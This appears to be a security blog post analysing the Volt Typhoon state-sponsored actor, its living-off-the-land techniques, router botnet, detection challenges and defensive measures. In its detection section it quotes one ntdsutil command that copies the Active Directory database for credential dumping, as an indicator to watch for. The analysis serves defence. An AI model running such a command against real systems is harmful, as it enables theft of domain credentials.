Volt Typhoon: Living off the Land
Back to Blog
APT Analysis
May 24, 202313 min read

Volt Typhoon: Living off the Land

S
Shubham Singla

They are inside the wires. Volt Typhoon isn't looking for credit card numbers or trade secrets. They are pre-positioning for war. This state-sponsored actor has infiltrated US critical infrastructure using technique so stealthy it changes the paradigm of detection.

Global Threat Map

Executive Summary

In mid-2023, Microsoft, the NSA, and CISA released a joint advisory about a threat actor named Volt Typhoon. Attributed with high confidence to the People's Republic of China (PRC), this group has been active since mid-2021.

Their targets are strategic: Communications, Manufacturing, Utility, Transportation, Construction, Maritime, Government, IT, and Education sectors. Specifically, they targeted infrastructure in Guam—a critical US naval outpost in the Pacific.

The goal? "Disruption of critical communications infrastructure between the United States and Asia region during future crises."

Living off the Land (LotL)

Volt Typhoon's tradecraft is defined by Living off the Land. They rarely download custom malware which keeps them hidden from antivirus scanners. Instead, they use the tools already installed on the system by the administrators.

The Toolkit of Invisibility

  • PowerShell: Used for information gathering and execution.
  • WMI (Windows Management Instrumentation): Used to move laterally between computers.
  • Netsh: Used to setup port forwarding and proxies.
  • Certutil: Used to download files (ironically a certificate utility).

By using these tools, their activity blends in with normal system administration. To a Junior SOC Analyst, a PowerShell command running net user looks like an admin checking an account, not a hacker reconnoitering.

The SOHO Router Botnet

To hide their origin, Volt Typhoon compromised thousands of Small Office/Home Office (SOHO) routers. Brands like ASUS, Cisco, D-Link, and Netgear were targeted. These devices are often forgotten, unpatched, and sit directly on the internet.

The attackers used these routers as a proxy mesh. When they attacked a US power plant, the traffic didn't come from a Shanghai IP address; it came from a residential IP in Ohio. This "operational relay box" (KV-botnet) made geo-blocking useless.

Botnet Visualization

Technical Deep Dive: The Attack Anatomy

Understanding the specific mechanics of the attack is crucial for engineers. Most advanced threats follow the Cyber Kill Chain model:

RECONNAISSANCE: The attacker gathers information on the target. This can be passive (OSINT) or active (port scanning).

WEAPONIZATION: Creating a deliverable payload (e.g., a malicious PDF or Office macro).

DELIVERY: Transmitting the weapon to the target (e.g., via Phishing or USB).

EXPLOITATION: Triggering the payload to exploit a vulnerability (e.g., CVE-2023-xyz).

INSTALLATION: establishing a backdoor or persistence mechanism (e.g., a scheduled task or registry key).

COMMAND & CONTROL (C2): The compromised system calls home to the attacker server for instructions.

ACTIONS ON OBJECTIVES: The attacker achieves their goal (encryption, extensive data exfiltration, destruction).

Detection Challenges

Detecting Volt Typhoon requires Behavioral Analysis. You cannot search for a file hash because there is no file. You have to search for the pattern of commands.

For example, ntdsutil.exe is a legitimate tool for Active Directory maintenance. However, if it creates a snapshot of the database and saves it to a Temp folder, that is a high-fidelity indicator of credential theft.

// Suspicious Command: Creating a shadow copy for credential dumping

cmd.exe /c ntdsutil "ac i ntds" "ifm" "create full c:\programdata\microsoft\recovery" q q

Regulatory and Compliance Context

In the aftermath of such incidents, organizations must navigate a complex web of regulatory obligations. Failure to comply can result in severe fines and reputational damage.

GDPR (General Data Protection Regulation)

For organizations operating in or serving citizens of the EU, GDPR mandates strict breach notification timelines (usually within 72 hours). Article 32 requires the implementation of appropriate technical and organizational measures to ensure a level of security appropriate to the risk.

NIST Cybersecurity Framework

The NIST framework provides a standard for critical infrastructure. It is organized around five core functions: Identify, Protect, Detect, Respond, and Recover. This incident highlights failures primarily in the 'Protect' and 'Detect' functions.

Local Legislation (Privacy Act 1988 - Australia)

Under the Notifiable Data Breaches (NDB) scheme, organizations must notify the OAIC and affected individuals if a data breach is likely to result in serious harm. This includes unauthorized access to personal information.

The Geopolitical Context

The targeting of Guam is significant. In the event of a conflict over Taiwan, Guam would be a primary staging ground for US Air Force and Naval operations. By embedding themselves in the water and power utilities of the island, Volt Typhoon could theoretically "turn off the lights" at a critical moment for logistics, delaying a US response.

This moves cybersecurity from the realm of espionage (stealing secrets) to kinetic warfare preparation (sabotage). It is a violation of international norms regarding critical infrastructure targeting.

Standard Incident Response Procedures

A robust Incident Response Plan (IRP) is the best defense against chaos. The SANS Institute outlines a six-step process:

  1. Preparation: Training, tooling, and dry runs (tabletop exercises).
  2. Identification: Detecting the deviation from normal behavior and determining the scope.
  3. Containment: Short-term mitigation (isolating the system) and long-term containment (patching).
  4. Eradication: Removing the root cause (malware, compromised accounts).
  5. Recovery: Restoring systems to normal operation and monitoring for recurrence.
  6. Lessons Learned: Post-incident analysis to improve future response.

How to Defend

Defense against LotL requires rigorous logging:

  1. Enable PowerShell Logging: Script Block Logging (Event ID 4104) captures the actual code executed, even if it is obfuscated.
  2. Monitor Account Usage: Why is the "Backup_Admin" account logging in at 3 AM from a VPN IP?
  3. Patch your Edge: Those SOHO routers and VPN concentrators (like Fortinet and Ivanti) are the front door. Patch them.

Comprehensive Mitigation Strategies

To prevent recurrence, a defense-in-depth approach is required. This involves layering security controls so that if one fails, another catches the threat.

  • Network Segmentation: Isolate critical assets in separate VLANs with strict firewall rules (East-West traffic inspection).
  • Endpoint Detection and Response (EDR): Deploy agents that can detect behavioral anomalies, not just file signatures.
  • Identity and Access Management (IAM): Enforce Least Privilege and MFA everywhere. Review access logs regularly.
  • Regular Audits: Conduct penetration testing and vulnerability scanning (using tools like Nessus or Burp Suite) at least quarterly.

Volt Typhoon is a reminder that the adversary is watching, waiting, and preparing. They are not smash-and-grab robbers; they are squatters in the basement. Evicting them requires hunting them down, room by room.